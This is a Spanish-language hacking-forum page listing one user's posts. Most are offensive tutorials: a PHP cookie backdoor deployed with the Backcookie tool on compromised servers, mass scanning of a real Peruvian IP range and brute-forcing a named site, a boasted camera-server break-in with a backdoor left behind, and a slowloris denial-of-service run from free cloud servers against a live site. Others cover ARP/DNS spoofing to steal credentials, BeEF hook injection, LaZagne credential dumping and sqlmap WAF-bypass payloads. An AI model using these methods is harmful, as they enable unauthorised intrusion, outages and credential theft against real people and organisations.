Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BrowserNet

#61


Saludos nuevamente hermanos de underc0de en esta oportunidad vamos a modernizarnos para dejar atrás las webshells, que en su mayoría ya están quemadas por algunos antivirus y firewalls que puede tener un servidor web,dando  entrada a Backcookie  una herramienta escrita en python la cual tiene como función tener conexiones entrantes de servidores web mediante cookies, vayamos a la acción

Backdoors detectable.



¿Que es una Cookie?
 
Las cookies son un mecanismo por el que se almacenan datos en el navegador remoto para monitorizar o identificar a los usuarios que vuelvan al sito web.

referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo que haremos sera descargar la herramienta Backcokkie, luego de ello pasaremos a extraerlo

Código: text
root@kali:~# wget https://github.com/jofpin/backcookie/archive/master.zip 

Antes de comenzar deseo mandar un saludo  para un buen hermano mio, "Fraph Core" que el día de hoy esta cumpliendo un año mas de vida, por este motivo realizo este post, ya que la herramienta es creada por el y es la forma mas oportuna de hacerlo.
Feliz cumpleaños hermano!!

Iniciando la herramienta




Antes que nada podemos observar como funciona la herramienta, de acuerdo al autor funciona de dos maneras :

Código: text
    Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
    Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Métodos de subir el código de conexión 

Source:


<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>


El primer método en un servidor VPS

sera crear un archivo .php añadiendo el codigo y subirlo al servidor web.



El segundo método

seria añadir el código en archivo del servidor web, mediante una webshell.



Estos métodos serian los que podan utilizar ustedes,mas abajo les tengo una sorpresa cual método yo  me ingenie para hacerlo aun mas confidencial.

entonces una ves añadido nuestro código, pasaremos ejecutarlo:





Como podemos observar el dominio comprometido es un servidor privado (VPS), la cual tenemos acceso al sistema del servidor, la cual podemos subir nuestros payload de meterpreter,archivos RAT,o los que ustedes deseen, en mi caso les enseñare a utilizar esta herramienta de manera estándar, en este servidor VPS en Windows como prueba de concepto.

Lo que haremos sera ejecutar el comando CMD



como vemos hemos tenido acceso a la interprete de comandos de windows, lo que podemos hacer ahora es ejecutar los comandos que utilizamos siempre, en mi caso haré un mapeo de todas las IP'S conectadas al servidor, en este caso todos los demás servicios privados.



como podemos observar nos arroja las IP'S conectadas la cual podemos aprovecharlas para auditarlas y explotarlas mediante metasploit, o subir un archivo RAT y capturar todos los datos del servidor, por mi parte no lo haré, por motivos de ética, de igual manera podemos ver el tipo de servicio del router como veremos aquí:



Paremos a entrar a otro servidor web, en este caso el siguiente:



Como vemos es un servidor en Linux la cual, podemos interactuar con ella, sin mas que decir doy como culminado este POST, espero les aya gustado demasiado la herramienta Backcookie, ya que llevo casi un año utilizando esta gran herramienta y lo hago publico porque eh visto que hay "Personas" que han modificado el nombre del autor y han estado ripiandola :/
#62

Buenas tardes hermanos de underc0de, les traigo otro servicio de mensajería encryptada llamada qTox, es un protocolo de mensajería y llamadas de vídeo gratuito y de código abierto peer-to-peer cifrada al instante. El objetivo declarado del proyecto es proporcionar una comunicación segura pero de fácil acceso para todo el mundo, es un poderoso cliente de Tox que sigue las directrices de diseño Tox mientras se ejecuta en todas las plataformas.

¿Como se inicio Tox?

Con el auge de los programas de vigilancia del gobierno, Tox provee una aplicación fácil de usar que le permite conectarse con amigos y familiares sin que nadie más escuche. Mientras otros servicios de renombre que tenga que pagar por características, Tox es totalmente gratuito y viene sin la publicidad.

¿Como te protege Tox?

Tox protege su privacidad mediante la eliminación de la necesidad de confiar en las autoridades centrales para proporcionar servicios de mensajería, ocultando su identidad (En forma de meta-datos, su dirección IP) de las personas que no son sus amigos autorizados, haciendo cumplir Off-The-Record Mensajería como predeterminada y sólo modo de funcionamiento para todos los mensajes, y al hacer que su identidad imposible de falsificar sin robar su clave personal y privado en su propia computadora.

Tox no intenta ocultar su dirección IP cuando se comunica con otros usuarios, ya que todo el punto de peer-to-peer es conectar directamente a tus amigos. Una solución existe en forma de túnel conexiones Tox a través de Tor. Sin embargo, un usuario no puede revelar la dirección IP de otro usuario utilizando sólo una identificación Tox para encontrar el usuario en la DHT, la dirección IP sólo será perceptible cuando los usuarios se convierten en "amigos."

Características:

    Uno a uno de la charla con los amigos
    chats en grupo
    Las transferencias de archivos, con la vista previa de imágenes
    Llamadas de audio, incluidas las llamadas de grupo
    Las llamadas de video
    Apoyo Tox DNS y Tox URI
    Las traducciones en varios idiomas
    Avatares
    Mensajes fuera de línea Faux
    Historia
    Imágenes
    Emoticones
    Las actualizaciones automáticas en Windows y Mac, paquetes en Linux
    Y muchas más opciones!

Instalación:

Antes de empezar de descargar los repertorios, pasaremos a añadir el repositorio de Tox.
Código: text

root@kali:~# echo "deb https://pkg.tox.chat/debian nightly release" | sudo tee /etc/apt/sources.list.d/tox.list
root@kali:~# wget -qO - https://pkg.tox.chat/debian/pkg.gpg.key | sudo apt-key add -
root@kali:~# sudo apt-get install apt-transport-https
root@kali:~# sudo apt-get update



Luego de completar lo siguiente, pasaremos a descargar el cliente de qtox para adjuntar la conexión de este servicio.
Código: text

root@kali:~# sudo apt-get install qtox
root@kali:~# qtox



Al terminar de instalar el qtox, ejecutamos la herramienta y nos aparecerá  el siguiente cuadro donde nos registraremos al servicio, añaden sus credenciales de cuenta y le darán "Create Profile" y automáticamente nos aparecerá nuestra plataforma de CHAT:


Como vemos yo configure el idioma a español ustedes pueden hacerlo en la barra de abajo de una tuerca esta la configuración de la estructura y pueden editarlo a su gusto, en la parte para agregar a sus amigos necesitan su ID de tox, la cual esta en su perfil de usuario.

Espero les haya gustado este articulo, un saludo.
#63
Buenas tardes a todos los hermanos presentes, exacto nuestro administrador general Antrax dio todo su esfuerzo y dedicación, con ayuda de los demás miembros administrativos y moderadores para sacar adelante la comunidad.

sobre todo lo mas importante es tener "Miembros", ya que ellos nos motivan ha elaborar talleres y papers de calidad para su aprendizaje

Buen día hermanos underc0deanos  8)


#64
SI bien es cierto, underc0de es una "comunidad" que tiene años de estar vigente en nuestra época y es muy conocida en este mundo del Pentesting & Seguridad Informática

¿Que significa underc0de para ti?



Para mi underc0de es una comunidad que se destaca por sus buenos administradores y miembros, sobre todo en su amabilidad y humildad que se tiene, en mi experiencia muy corta, me agrada esta comunidad y seguiré dando lo mejor de mi para brindar mis "Micro-conocimientos".

Sin duda en la comunidad se enseña y se aprende, pero mas que eso se ganan "Amistades" : )

Saludos para todos mis hermanos de underc0de!!  8)


#65
De hecho que si, el post es una metologia,  pero "lammer"  viene a la personas que se creerán dioses luego de practicar lo relacionado al POSTS, por eso dije para los "NIÑOS RATAS"  :p
#66


Buenas madrugadas xD hermanos de underc0de les enseñare a como podemos auditar sistemas a nivel mundial por los rangos que las ISP otorgan a cada país, este POST lo quise elaborar hace aproximadamente hace mas de 1 año, pero motivos de tiempo y ocupaciones no me facilito hacerlo, pero hoy tengo el agrado de hacerlo publico, eh visto que la herramienta "Masscan" ya la han publicado en algunos vídeos  o foros pero con un contenido pobre, claro sin desprestigiar a mis colegas en sentido "ordinario", lo que haré yo sera innovar las investigaciones en adjuntar las herramientas  Masscan y Blockfinder, para globalizar nuestra investigación a un nivel de calidad mundial.

¿Que es Masscan?

Masscan es el escáner más rápido en en análisis de  puerto de Internet. es capaz de analizar la totalidad de Internet en menos de 6 minutos, la transmisión de 10 millones de paquetes por segundo.

Produce resultados similares a nmap el más famoso escáner de puertos.

literalmente funciona más como scanrand, unicornscan y zmap, utilizando la transmisión asíncrona. La principal diferencia es que es más rápido de estos otros escáneres. Además, es más flexible, permitiendo rangos de direcciones y rangos de puertos arbitrarios.

¿Que es Blockfinder?

Blockfinder permite identificar, contactar y potencialmente obtener cada red de computadoras en el mundo,  es una consola basada en un texto simple, esta herramienta envuelve una lista de bloques de red para un país determinado otorgando los rangos de IP que se utilizan en sus ISP.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Luego de haber leído la función de cada herramienta, pasemos a descargarlas ya sea manualmente o por la terminal, en mi caso lo haré por la terminal.

Código: text
root@kali:~# git clone https://github.com/robertdavidgraham/masscan.git
root@kali:~# cd masscan
root@kali:~/masscan# chmod 775 *
root@kali:~/masscan# sudo apt-get install git gcc make libpcap-dev




lo primero que hice fue descargar el masscan, posteriormente ingresamos  la carpeta dimos los permisos de ejecución al modulo y luego de ello instale lipbcap, ya que necesitamos de dicho repositorio para que la herramienta  se ejecute sin ningún error.

Luego de ello pasaremos a instalarlo con el comando "make"



Una ves hecho todos los procedimientos tendremos nuestro masscan corriendo perfectamente,antes de ejecutarlo pasaremos a descargar Blockfinder.
Código: text

root@kali:~# git clone https://github.com/ioerror/blockfinder.git
root@kali:~# cd blockfinder
root@kali:~/blockfinder# chmod 775 *
root@kali:~/blockfinder# ./blockfinder.py -i




Como vimos de igual manera lo descargamos, entramos al directorio, dimos permisos en el modulo pero al ejecutarlo ./blockfinder.py -i , la sentencia -i actualiza los paquetes de rangos relacionados a cada código ISO de cada País, la cual beneficiaria esta herramienta para tener un buen resultado.

Códigos ISO

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una ves entendido lo siguiente, pasaremos a obtener los rangos de IP de un país, en mi caso buscare el de Perú para esta prueba de concepto.
Código: text

root@kali:~/blockfinder# ./blockfinder.py -v -t PE




Para ver el análisis completo puede ingresar al siguiente link:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
una ves obtenido los rangos pasaremos a escoger un RANGO que deseemos, en mi caso fue el siguiente: 190.187.128.0/17

ahora pasaremos a ingresar al masscan para analizar el rango especifico y puertos que deseemos capturar en mi caso, sera el 445 que es vulnerable a muchos ataques como el conocido exploit Netapi, por msfconsole, de igual manera podemos ubicar puertos referentes a FTP,SMTP, entre muchos los cuales tengan como objetivo.



como vemos nos arroja una lista el escaneo y vemos que esta empezando a escanear 32769 equipos que están en proceso de análisis, si deseamos guardarlo en un archivo podemos hacerlo de la siguiente manera:

Código: text
root@kali:~/masscan/bin# ./masscan -p445 190.187.128.0/17 -oX scan.xml

en mi caso yo lo deje como opcional llame el archivo scan con la extensión .xml.



el archivo se encuentra alojado en la carpeta donde ejecutaron el masscan con el nombre que asignaron en mi caso scan.xml
En nuestro caso podemos escoger una IP y analizarlo con el buscador Shoudan para ver los servicios que consta dicho sistema:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



ataques remotos uno puedo añadir una lista de IP para proceder a escanear y lanzar el Hail Mary para explotar de manera automática algunos sistemas mientras puede estar ejecutando otra cosa a la vez.

en mi caso yo hace 10 días atrás hice una explotación por telnet a un servidor de cámaras las cuales pueden ver en la siguiente imagen:



En mi caso yo explote un servidor Telnet, con el puerto 23 y deje un backdoor dentro, por seguridad solo muestro el panel de acceso ARRIS.



en mi caso encontré una IP relacionado a una web la cual fue : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, entonces si uno desea auditar ese sistema web con un ataque de fuerza bruta puede hacerlo con la herramienta "BruteX"

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: text
root@kali:~/BruteX# ./brutex bembos.com.pe






Espero les aya agradado este POST', saludos para Antrax, Mago Astral, Gabriela, Snifer y todos los compañeros  8)
#67


Saludos fieles Hermanos de underc0de en esta oportunidad, tengo algo que les encantara hace momentos me enviaron un vídeo de algunos Rat Kids, que utilizaban servicios de programación en linea todos ellos subían archivos escritos en perl  solamente para hacer un flooder enviando paquetes al puerto  UDP 80, obteniendo la IP de sus victimas, mediante la tecnica de IP resolver Skype, dejare algunos servicios online:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

en mi caso tengo uno privado con los módulos completos, hace meses lo liberaron un foro carder en fin, seguramente ya la liberaron, en fin esto no es el tema que tocare,  es el método de los niños rata que doy como "ejemplo" de lo que solamente hacen con eso.



Educando a los rat kids


Estuve observando ese vídeo y como le dije el método de la terminal ya tiene tiempo que se ejecutada dichos procesos pero hoy en día los niños ratas queman todo, al nosotros crear una cuenta en una plataforma de desarrollo de programación, los servidores añaden maquinas virtuales  que otorgan a cada usuario por defauld en su dedicado (VPS), que en su mayoría tienen privilegios ROOT, en este articulo aprenderemos aprovecharnos de esto y penetrar el sistema de diferentes maneras jugando al crazy code, uno de los servicios que a sido tan quemado, pero aun funciona para hacer algunas practicas de testeo de banda ancha con herramientas que añadidas  a un vps, podría colapsar plataformas web con buena banda ancha, el dominio es el siguiente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



como en todo servicio enfocados a estas plataformas siempre nos pedirá que nos registremos para poder acceder al servicio correctamente, una ves añadido  lo siguiente, les pedirá que añaden el código de activación procederemos a entrar a la plataforma, pero siempre se creara nuestra "Maquina virtual", para entrar a nuestra propia consola.



una ves que se cree nos arrojara a la plataforma del sistema:



las personas que han manejado o manejan sistema linux, puede observar que no solamente añadimos código de programación, si no que al ver la terminal con nuestro nombre de usuario la curiosidad mato esta ves al sistema jaja.







lo que haré en esta oportunidad sera darle una clase de como hacer una verdadera denegación de servicio, este es el vídeo de un niño rata:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

si vieron el vídeo, creo que ustedes como personas con conocimiento podrán observar porque deseo educar a estos jóvenes con mala orientación, aunque por algo se empieza entonces que sigan su camino en todo este tiempo, mis deseos es que aprendan de la forma correcta.

lo que haré sera añadir el código del denegador de servicios por excelencia slowloris,  añadiremos la source en un nuevo archivo y lo guardaremos.

source:
Código: text

https://ghostbin.com/paste/hvqz3


Post que elabore hace años:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

siguiente con lo nuestro, añadiremos el source a nuestro archivo creado en extensión .pl , mi archivo lo llame " No tienes permitido ver los links. Registrarse o Entrar a mi cuenta "



como podemos observar el archivo esta en el servidor, entonces lo que haré sera ejecutar el slowloris con su comando por defauld para verificar las opciones que tiene.



obs, nos tiro un error en la cual nos dice que no esta instalado el repertorio SOCKET, la cual slowloris tiene como conexión de envío entonces como lo haremos? , es simple estamos en una terminal solamente ejecutamos apt-get install ( con el nombre del repertorio) , las cuales son los siguientes:
Código: text

sudo apt-get install libio-socket-inet6-perl

sudo apt-get install libio-socket-multicast-perl

sudo apt-get install libio-socket-ssl-perl


Una ves añadidos nuestra terminal nos arroja los datos de instalación por defecto aparecerán:



Una ves se instale todos ejecutaremos el ataque en mi caso añadí mis configuraciones del slowloris privadas mía por ende esta ves no podre dárselas y empezara a enviar peticiones grandes enviados por el dedicado:



Una prueba de concepto hice el ataque en la siguiente web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , la cual le envió la web a un colega mio que me confirmo que estaba caído, para estar 100 % podemos verificarlos en:



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero es solo denegación de servicio no es gran cosa, les enseñare otros métodos con algunas web que eh estado investigado con las cuales pueden practicar.



Como podemos observar la compatibilidad que escogí del servicio fue un lenguaje php, incorporado con MySQL, Apache 2.4 , de igual manera podemos ejecutar comandos en la terminal, lo que añadi fue un script añadiendo una cookie que sera mi puerta trasera para conectarme desde mi terminal de linux que es compatible con Backcokkie, la cual el articulo de uso lo pueden ver aquí mismo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

una ves añadido el source pasara a guardarlo y activaremos nuestro servidor, una ves completado ejecutaremos el backcookie:



de igual manera pueden utilizar otro backdoor como "Weevely" para comprometer todo el sistema, les dejare el post que elabore hace pocos dias.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

otro tipo de ataque también puede ser subir una webshell y tomar control de acceso de todos los servicios que conté el servidor mediante un Symlinking o Rooting, en mi caso solamente subiré la webshell del Team Albariam:



Deseas aprender a utilizar esta webshell y aprender symlinkg, tengo un vídeo de hace años de mi auditoria la cual los ayudara



de igual manera pueden conectar sus servicios mediante Putty, siempre y cuando en su plataforma tenga su SSH con sus credenciales para que se conecten al dedicado mismo, sin mas que decir espero les aya gustado este POST, un saludo !!

#68


Saludos mis hermanos de underc0de les enseñare un pequeño tutorial de como podemos interceptar nuestros ordenadores mediante BurpSuite y capturar todos los datos de los servicios que las victimas estén usando.

pero antes de utilizar BurpSuite, lo que haremos sera utilizar ettercap que es una herramienta que nos permite capturar los datos de peticiones de la red en general.

Lo primero que haremos sera abrir la terminal y procederemos ejecutar lo siguiente:

Código: text
root@kali:~# ettercap -i eth0 -T -q -M ARP ///192.168.1.1///




Porque añadí  la interface de red ? -i eth0 ,es simple porque la estoy corriendo desde una maquina virtual que supuesta mente esta conectada e identificada como una conexión de red LAN, si yo estuviera conectado en una red WLAN seria -i wlan0, para que se vayan guiando pueden ver lo siguiente:



como podemos observar a esto era lo que me refería hace momentos, bueno una ves entendido pasaremos ahora a hacer un DNS spoofing que es un ataque de recopilación de servicios DNS de los servidores que se conectaran nuestra red  como por ejemplo dominios,etc, y para mejorar nuestro ataque utilizaremos dnsspoof forja respuestas a consultas DNS dirección / puntero arbitrarias de la LAN interna. Esto es útil en pasar por los controles de acceso basados en el nombre de host o en la implementación de una variedad de controles de red eficientes.

para ser mas concreto sirve para interceptar las consultas de los clientes de LAN para que cuando se dirigían a un sitio web por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sea respondida con la dirección IP para web.internal.lan (10.10.10.1), enviando peticiones falsas y los datos reales nos lleguen a nosotros,la mejor parte es dnsspoof será única intercepción nombres de host que configurar el daemon que debe buscar todas las demás consultas van directamente a su servidor DNS interno como normal.

En este caso estoy utilizando la interface eth0 la cual añadiremos a dnsspoof de la siguiente manera:
Código: text

root@kali:~# dnsspoof -i eth0




Con todo lo siguiente ya tendremos las conexiones recibidas por todos los sistemas conectados, por ejemplo:



por ejemplo encontramos a un tipo viendo porno xD hahahahahha na es una prueba no se emocionan que no se liberara leaks de cuentas premium, de acuerdo a ello podemos observar que nuestra actual victima esta ejecutando el navegador Mozilla, lo que haremos sera abrir BurpSuite y procederemos ir a entrar a la pestaña Proxy  y entraremos a la sección opcións .

Luego de ello pasaremos a añadir 2 nuevas listas como por ejemplo fueron

    192.168.179.129:80
    192.168.179.129:443


al añadir nuestra IP y esos puertos vamos a capturar los datos de red directamente en el Burpsuite, ya que esos puertos son los que estarán en escucha para ettercap



Una ves configurado nuestro servidor de escucha, lo que haremos sera dirigirnos a "la pestañña" Intercept.



y le daremos en Intercept para proceder a capturar los datos de nuestra victima, en este caso la victima añadirá sus credenciales de usuario en la web porno :v



Una ves que nuestra victima aya ingreso sus datos, ya hemos capturado sus credenciales veamos que encontramos con BurpSuite



como vemos hemos capturado el parámetro "POST" , la cual nos arroja como resultado el texto plano de los datos que ingresamos en las credenciales de usuario.

POST /user/login/11/5502/14/ HTTP/1.1
Host: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cookie: CAKEPHP=b87e0cb0837559254aea4595cc456a2c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
_method=POST&data%5BUser%5D%5Busername%5D=porno2014&data%5BUser%5D%5Bpassword%5D=dejalapaja


lo que nos interesa en este entonces es los datos de login las cuales fueron :
Código: text

User : porno2014 Password: dejalapaja


de igual manera podemos entrar a la siguiente pestaña para ver las peticiones DNS de las victimas.



de igual manera como pueden observar tambien bypasseamos las conexiones HSTS / que son las conexione seguras que piden un protocolo SSL



Bueno esto fue todo espero les aya gustado este POST, un saludo para todos los seguidores.

Happy Hacking!
#69
Para nada hermano, no es para usted como le comento no puedo hablar de alguien que  me brindo ayuda, es para una persona que comento un post mio, no se preocupe hermano.

Saludos bro  8)
#70
muchas gracias hermano  Stiuvert, daré todo de mi para traer un buen contenido para enseñar  y sobre todo aprender de ustedes, Saludos y éxitos hermano.
#71
Muchas gracias hermano, Mago Astral por lo que veo usted también estuvo en CyberLocos, me da intriga cual de todos los compañeros es usted jeje un saludo hermano   8)
#72


Main in the middle o hombre en el medio es un ataque en la cual nosotros estaremos en el medio entre los ordenadores y el rooter capturando el trafico de datos con una metodología que pasare a explicar sin tecnicismo en una imagen:



cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al  rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.

Primer escenario Ettercap


En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen  entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento. 



Listado de red lo puedo ver en "Hosts" >> Hosts List



la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2  una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.



Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":



ahora daremos en primera opción "para establecer el sniffeo remoto.



al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas  de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0

Código: text
 root@kali:~# driftnet -i eth0




Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes,  un ejemplo mi victima esta en la siguiente web:



Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:



Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Segundo escenario MITMF

Segundo escenario MITMF


MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.

Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.

descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.
Código: text

root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev




Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:
Código: text

root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt




Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP

Código: text
root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js

-i identificamos el tipo interface en mi caso "eth0", --gateway es el servicio rooter y por ende --target la ip de la victima.



entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.



al momento que la victima entre nosotros en primer plano tendremos los datos DNS:



Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.



Aqui unos metodos de explotacion:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Atacando con metasploit:




En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:

Módulos nuevos:





auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill
exploit/multi/browser/adobe_flash_shader_job_overflow

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

root@kali:~# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)




de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Diferentes técnicas para crear tus payload:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#73
Buenas tardes hermano, de hecho LaZagne puede ser utilizado en "Metasploit" una ves adentro en la session meterpreter de nuestra victima, subes el archivo "LaZagne.exe" y lo ejecutas para capturar todos los datos almacenados, de igual manera puedes usarlo de forma local para que muestre los datos WIFI almacenados en tu S.O, ( Entra a tu CMD modo Administrador )

Para los que tienen problemas en windows les daré el siguiente TIPS :

1- descargan el ejecutable de "laZgane.exe". ( No se instala es portable y solo se ejecuta por la interprete de comandos /CMD)
2- Abriremos la terminal "CMD" como administrador
3- buscar la ruta donde esta el archivo "laZgane.exe.exe", de preferencia déjalo en el disco duro C : ,suelto.
3- añadiremos los comandos ejemplo el comando de "WIFI" laZgane.exe wifi -v
5- Disfruta herramienta

Saludos  8)
#74
Ashley Madison fue gracioso porque estaba registrado el padre de EX-compañero de estudios JAJAJAJA  8)
#75
OLD jeje hermano para nada recién me eh iniciado hace 3 años y cometí el error en no aprender a programar que es lo mas interesante y profesional de alguien que se dedique a cualquier rama bro, estoy empezando a practicar Python <3

Gracias por su comentario bro, Saludos y Éxitos
#76
Buen aporte compañero, saludos y éxitos hermano  8)
#77
Pentesting / Re:Bypasseando WAF con SQLMAP & TAMPER
Mayo 23, 2016, 11:37:33 AM
Ejecutarlo de manera manual aveces es mas efectivo, El orden de los factores no altera el producto pero me encanto la manera que el compañero lo redacto  8)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#78
Pentesting / Bypasseando WAF con SQLMAP & TAMPER
Mayo 23, 2016, 11:27:24 AM

Saludos mis fieles lectores estuve leyendo algunos mensajes de mis seguidores y me comentaban lo siguiente ¿Como Bypassear el WAF de los servidores web para ataques de inyección SQL? ya que no hay mucha información sobre que tipo de de insertacion que contienen cada tamper en sus payloads, me tomare la molestia de pasarlo a explicar.

¿Que es un WAF? 


WAF - Web Application Firewall (Aplicación de corta fuegos Web), es un servicio de filtros contra ataques de código malicioso como los conocidos "XSS" - Cross-Site-Scripting, "SQL inyección", "RFI" - Remote File Inclusión, "DoS" - Denegación de servicios, "DDoS" - Distribución de denegación de servicios, entre otros ataques detectados pasaran a ser bloqueados por este servicio de filtros.

Existen muchos, pero algunos conocidos y familiarizados con la mayoría de plataformas son:

ModSecurity
Naxsi-Nginx




¿Que es un Tamper?

Un Tamper es un aplicativo open source creado en python compatible con sqlmap, para las funciones de insertar payloads camuflados, mediante envíos de peticiones de sintaxis a la base de datos burlando algunas aplicaciones de protección web, como los conocidos "WAF"

La ubicación los tampers se encuentren en el siguiente directorio: /usr/share/sqlmap/tamper


Funciones y codificaciones de los Tamper mas utilizados



space2comment.py         - Sustituye un carácter de espacio >>  " ( ' ') ", con inserciones ' / ** /'

charencode.py                 - codifica todos los caracteres con numérico   44%20%54%20%

base64encode.py            - convierte todo los caracteres en codificación base64
'MScgQU5EIFNMRUVQKDUpIw=='

randomcomments.py     - Añade comentarios al azar mediante búsquedas de palabras MySQL
'I/**/N/**/SERT'

versionedkeywords.py   - Especifica cada palabra clave de versión de búsqueda MySQL
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR

space2randomblank.py - Sustituye carácter de espacio ('') con un carácter en blanco al azar 'SELECT%0Did%0DFROM%0Ausers'

modsecurityversioned.py ejecuta consulta completa con comentario versionado
'1 /*!30874AND 2>1*/--'

equaltolike.py - Reemplaza todas las apariciones de operador igual ('=') con el operador 'LIKE'
'SELECT * FROM users WHERE id LIKE 1'

randomcase.py - Reemplaza cada personaje de palabras clave con el valor de caso fortuito 'INseRt'


Ojo: cada tamper tiene como función única para uno o varios tipos de lenguajes de base de datos.

Si desean saber mas funciones de algunos Tamper's pueden verlo en los repertorios de cada uno en el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

